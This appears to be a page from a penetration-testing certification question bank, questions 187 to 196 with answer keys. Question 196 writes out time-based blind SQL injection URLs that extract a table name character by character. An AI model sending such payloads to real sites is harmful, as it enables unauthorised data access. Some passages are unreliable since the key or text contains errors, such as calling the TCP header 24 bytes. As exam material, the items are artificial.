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QUESTION: 187 
Which of the following reports provides a summary of the complete pen testing process, its outcomes, and 
recommendations? 


A. Vulnerability Report 
B. Executive Report 

C. Client-side test Report 
D. Host Report 


Answer: B 


QUESTION: 188 
An automated electronic mail message from a mail system which indicates that the user does not exist on that 
server is called as? 


A. SMTP Queue Bouncing 
B. SMTP Message Bouncing 
C. SMTP Server Bouncing 
D. SMTP Mail Bouncing 


Answer: D 
Reference:http://en.wikipedia.org/wiki/Bounce_message 


QUESTION: 189 
Which one of the following tools of trade is an automated, comprehensive penetration testing product for 
assessing the specific information security threats to an organization? 


A. Sunbelt Network Security Inspector (SNSI) 

B. CORE Impact 

C. Canvas 

D. Microsoft Baseline Security Analyzer (MBSA) 


Answer: C 


QUESTION: 190 

Output modules allow Snort to be much more flexible in the formatting and presentation of output to its users. 
Snort has 9 output plug-ins that push out data in different formats. Which one of the following output plug-ins 
allows alert data to be written in a format easily importable to a database? 


A. unified 

B. csv 

C. alert_unixsock 
D. alert_fast 


Answer: B 


QUESTION: 191 
Application security assessment is one of the activity that a pen tester performs in the attack phase. It is 


designed to identify and assess threats to the organization through bespoke, proprietary applications or systems. 
It checks the application so that a malicious user cannot access, modify, or destroy data or services within the 
system. 
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Identify the type of application security assessment which analyzes the application-based code to confirm that it 
does not contain any sensitive information that an attacker might use to exploit an application. 


A. Web Penetration Testing 
B. Functionality Testing 
C. Authorization Testing 
D. Source Code Review 


Answer: D 


QUESTION: 192 

Which vulnerability assessment phase describes the scope of the assessment, identifies and ranks the critical 
assets, and creates proper information protection procedures such as effective planning, scheduling, 
coordination, and logistics? 


A. Threat-Assessment Phase 
B. Pre-Assessment Phase 

C. Assessment Phase 

D. Post-Assessment Phase 


Answer: B 
QUESTION: 193 
Which of the following defines the details of servicesto be provided for the client’s organization and the list of 


services required for performing the test in the organization? 


A. Draft 


B. Report 
C. Requirement list 
D. Quotation 


Answer: D 


QUESTION: 194 
Which of the following is not a condition specified by Hamel and Prahalad (1990)? 


A. Core competency should be aimed at protecting company interests 

B. Core competency is hard for competitors to imitate 

C. Core competency provides customer benefits 

D. Core competency can be leveraged widely to many products and markets 


Answer: A 
Reference:http://www.studymode.com/essays/Hamel-Prahalad-Core-Competency-1228370.html 


QUESTION: 195 

Transmission control protocol accepts data from a data stream, divides it into chunks, and adds a TCP header 
creating a TCP segment. 

The TCP header is the first 24 bytes of a TCP segment that contains the parameters and state of an end-to-end 
TCP socket. It is used to track the state of communication between two TCP endpoints. 

For a connection to be established or initialized, the two hosts must synchronize. The synchronization requires 
each side to send its own initial sequence number and to receive a confirmation of exchange in an 
acknowledgment (ACK) from the other side 

The below diagram shows the TCP Header format: 


Acknowledgement number 


Options 
Í Data (optional) 1 


How many bits is a acknowledgement number? 


A. 16 bits 
B. 32 bits 
C. 8 bits 

D. 24 bits 


Answer: B 
Reference:http://en.wikipedia.org/wiki/Transmission Control Protocol(acknowledgement number) 


QUESTION: 196 

A pen tester has extracted a database name by using a blind SQL injection. Now he begins to test the tableinside 
the database using the below query and finds the table: 

http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype="U')=3) 
WAITFOR DELAY '00:00:10'-- 

http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects 
where xtype=char(85)),1,1)))=101) WAITFOR DELAY '00:00:10'-- 

http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects 
where xtype=char(85)),2,1)))=109) WAITFOR DELAY '00:00:10'-- 

http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects 
where xtype=char(85)),3,1)))=112) WAITFOR DELAY '00:00:10'— 

What is the table name? 


A.CTS 
B. QRT 
C. EMP 
D. ABC 


Answer: C 
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